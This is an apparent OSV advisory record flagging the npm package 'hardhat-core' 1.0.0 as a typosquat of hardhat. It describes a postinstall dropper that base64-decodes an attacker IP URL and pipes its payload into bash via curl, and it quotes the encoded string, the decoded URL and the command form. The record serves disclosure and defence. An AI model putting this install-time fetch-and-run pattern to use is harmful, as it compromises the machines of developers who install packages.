{"id":"MAL-2026-3713","summary":"Malicious code in hardhat-core (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (bb86c79e7ed3cd429c0f28bc08e00ce020df2ec42fdda086ad8bfca99f259930)\npackage.json declares a postinstall script that base64-decodes the string 'aHR0cDovLzguMjE3Ljc1LjE0NzozMDAwL3BheWxvYWQ=' to the URL http://8.217.75.147:3000/payload and pipes the response into bash via `curl -s \u003curl\u003e | bash`. This fires automatically during `npm install`, executing attacker-controlled shell code fetched over plain HTTP from a hardcoded bare IP with no integrity verification. The package itself is empty (index.js exports `{}`) and its name impersonates the widely-used `hardhat` Ethereum tooling — the only purpose of installing it is to trigger the dropper. Three independent block signals are present: install-time curl|bash to a non-publisher bare IP, base64-obfuscated URL inside a lifecycle script, and a typosquat name with no real functionality serving as the lure.\n\n## Source: ossf-package-analysis (37a9993551389729247a4d3b88747296e12dc861db457d83581f0e60cd4d0c30)\nThe OpenSSF Package Analysis project identified 'hardhat-core' @ 1.0.0 (npm) as malicious.\n\nIt is considered malicious because:\n\n- The package executes one or more commands associated with malicious behavior.\n","modified":"2026-05-15T07:50:30.529002Z","published":"2026-05-13T12:01:29Z","database_specific":{"malicious-packages-origins":[{"sha256":"37a9993551389729247a4d3b88747296e12dc861db457d83581f0e60cd4d0c30","source":"ossf-package-analysis","modified_time":"2026-05-13T12:01:29Z","versions":["1.0.0"],"import_time":"2026-05-13T21:58:23.764687477Z"},{"id":"IN-MAL-2026-002819","source":"amazon-inspector","modified_time":"2026-05-15T03:21:38Z","versions":["1.0.0"],"sha256":"bb86c79e7ed3cd429c0f28bc08e00ce020df2ec42fdda086ad8bfca99f259930","import_time":"2026-05-15T07:37:20.952322779Z"},{"id":"IN-MAL-2026-002736","source":"amazon-inspector","modified_time":"2026-05-14T19:25:34Z","versions":["1.0.0"],"sha256":"fab375c953441e530540f01ba02981bb29edb746fdecc608249c7bc314ca39a3","import_time":"2026-05-15T07:37:18.7260115Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/hardhat-core/v/1.0.0"}],"affected":[{"package":{"name":"hardhat-core","ecosystem":"npm","purl":"pkg:npm/hardhat-core"},"versions":["1.0.0"],"database_specific":{"cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/hardhat-core/MAL-2026-3713.json","indicators":{"package_integrity":[{"filename":"hardhat-core-1.0.0.tgz","hashes":{"sha1":"7c766e1037afdf633f137c0688cff9e75dd22aae","sha512_sri":"sha512-jxPOG6m+gbRmsfDHuNq0cOwFIRcPFTqpUA0tEe1GjiiLBjpPYXMN/ge+KumOhXZTg380FrkWYG1h7Fa5F+gM2g=="}}],"evidence_files":[{"sha256":"ad71655f86483901c57b0116c7b3369d6e47b63b0ef327961b5547e7fb405fc0","path":"package.json","tlsh":"d4f0ab64af106af328c04e530a1b49cb64b3ca1f08287c68b39ba45d039c7eb15fb55e"},{"sha256":"8c392403f10df44e70244d14aa135cb572886ab4fb693af581c580207d943ae7","path":"index.js","tlsh":"bc900205816571811315c657a74960831bd4c394c55040a04744495d4016e4450b65d0"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"},{"name":"OpenSSF: Package Analysis","contact":["https://github.com/ossf/package-analysis","https://openssf.slack.com/channels/package_analysis"],"type":"FINDER"}]}